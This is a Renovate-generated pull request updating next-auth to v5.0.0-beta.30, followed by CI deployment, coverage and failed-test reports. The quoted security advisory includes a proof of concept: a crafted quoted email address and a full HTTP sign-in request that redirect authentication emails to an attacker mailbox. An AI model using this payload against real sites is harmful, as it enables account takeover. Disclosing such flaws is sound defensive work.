Deps: Update dependency next-auth to v5.0.0-beta.30[SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
next-auth (source)	5.0.0-beta.25 → 5.0.0-beta.30

GitHub Vulnerability Alerts

GHSA-5jpx-9hw9-2fx4

Summary

NextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in nodemailer's address parser used by the project (fixed in nodemailer v7.0.7). A crafted input such as:

"e@attacker.com"@​victim.com

is parsed incorrectly and results in the message being delivered to e@attacker.com (attacker) instead of "<e@attacker.com>@&#8203;victim.com" (the intended recipient at victim.com) in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.

Affected NextAuthjs Version

≤ Version	Afftected
4.24.11	Yes
5.0.0-beta.29	Yes

POC

Example Setup showing misdelivery of email

import NextAuth from "next-auth"
import Nodemailer from "next-auth/providers/nodemailer"
import { PrismaAdapter } from "@​auth/prisma-adapter"
import { prisma } from "@​/lib/prisma"

export const { handlers, auth, signIn, signOut } = NextAuth({
  adapter: PrismaAdapter(prisma),
  providers: [
    Nodemailer({
      server: {
        host: "127.0.0.1",
        port: 1025,
        ...
      },
      from: "noreply@authjs.dev",
    }),
  ],
  pages: {
    signIn: '/auth/signin',
    verifyRequest: '/auth/verify-request',
  },
})

POST /api/auth/signin/nodemailer HTTP/1.1
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 176
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Pragma: no-cache
Referer: http://localhost:3000/auth/signin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
accept: */*
accept-language: en-US,en;q=0.9,ta;q=0.8
content-type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="141", "Not?A_Brand";v="8", "Chromium";v="141"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
x-auth-return-redirect: 1

email=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin

Mitigation

Update to nodemailer 7.0.7

Credits

https://zeropath.com/ Helped identify this security issue

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated on behalf of Nordcom AB by Renovate Bot.

[vercel]

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
commerce-demo	Error		Feb 12, 2026 4:17pm
commerce-landing-demo	Error		Feb 12, 2026 4:17pm

[github-actions]

Coverage Report

Status	Category	Percentage	Covered / Total
🔵	Lines	16.77%	2864 / 17075
🔵	Statements	16.77%	2864 / 17075
🔵	Functions	51.19%	279 / 545
🔵	Branches	66.11%	677 / 1024

File Coverage

No changed files found.

Generated in workflow #10861 for commit 59dbb44 by the Vitest Coverage Report Action

[codecov]

❌ 2 Tests Failed:

Tests completed	Failed	Passed	Skipped
182	2	180	20

View the top 2 failed test(s) by shortest run time

apps/admin/src/utils/auth.adapter.test.ts > src/utils/auth.adapter.test.ts

Stack Traces | 0s run time

Error: querySrv ENOTFOUND _mongodb._tcp.dummy-string
⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯
Serialized Error: { errno: undefined, code: 'ENOTFOUND', syscall: 'querySrv', hostname: '_mongodb._tcp.dummy-string' }

apps/storefront/src/components/products/quantity-selector.test.tsx > components > QuantitySelector > updates the quantity when input value changes

Stack Traces | 1.04s run time

AssertionError: expected "spy" to be called with arguments: [ 5 ]

Number of calls: 0


Ignored nodes: comments, script, style
<html>
  <head />
  <body>
    <div>
      <section
        class="flex min-h-fit w-full overflow-hidden rounded-lg border-2 border-solid border-white bg-white p-0 leading-none opacity-50 drop-shadow transition-colors *:appearance-none *:text-center *:text-lg *:leading-none *:transition-colors"
      >
        <button
          aria-disabled="true"
          aria-label="decrease"
          class="transition-color duration-150 pointer-events-none cursor-not-allowed shadow-none aspect-[3/4] h-full select-none appearance-none rounded-none bg-transparent p-2 font-bold text-current"
          data-nosnippet="true"
          data-quantity-decrease="true"
          data-testid="quantity-decrease"
          disabled=""
          draggable="false"
          title="decrease"
          type="button"
        >
          –
        </button>
        <input
          aria-disabled="true"
          aria-label="quantity"
          class="rounded-lg pointer-events-none cursor-not-allowed h-full w-full grow appearance-none border-none bg-transparent text-sm font-bold outline-none focus:outline-none focus:ring-0"
          data-nosnippet="true"
          data-quantity-input="true"
          data-testid="quantity-input"
          disabled=""
          draggable="false"
          max="199999"
          min="1"
          pattern="[0-9]"
          placeholder="quantity"
          step="1"
          title="quantity"
          type="number"
          value="0"
        />
        <button
          aria-disabled="true"
          aria-label="increase"
          class="transition-color duration-150 pointer-events-none cursor-not-allowed shadow-none aspect-[3/4] h-full select-none appearance-none rounded-none bg-transparent p-2 font-bold text-current"
          data-nosnippet="true"
          data-quantity-increase="true"
          data-testid="quantity-increase"
          disabled=""
          draggable="false"
          title="increase"
          type="button"
        >
          +
        </button>
      </section>
    </div>
  </body>
</html>
 ❯ .../components/products/quantity-selector.test.tsx:27:36
 ❯ runWithExpensiveErrorDiagnosticsDisabled ../../node_modules/.pnpm/@testing-library+dom@10.1.0/node_modules/@.../dom/dist/config.js:47:12
 ❯ checkCallback ../../node_modules/.pnpm/@testing-library+dom@10.1.0/node_modules/@.../dom/dist/wait-for.js:124:77
 ❯ checkRealTimersCallback ../../node_modules/.pnpm/@testing-library+dom@10.1.0/node_modules/@.../dom/dist/wait-for.js:118:16
 ❯ Timeout.<anonymous> ../../node_modules/.pnpm/happy-dom@17.4..../src/window/BrowserWindow.ts:1431:16

To view more test analytics, go to the Test Analytics Dashboard
_{📋 Got 3 mins? Take this short survey to help us improve Test Analytics.}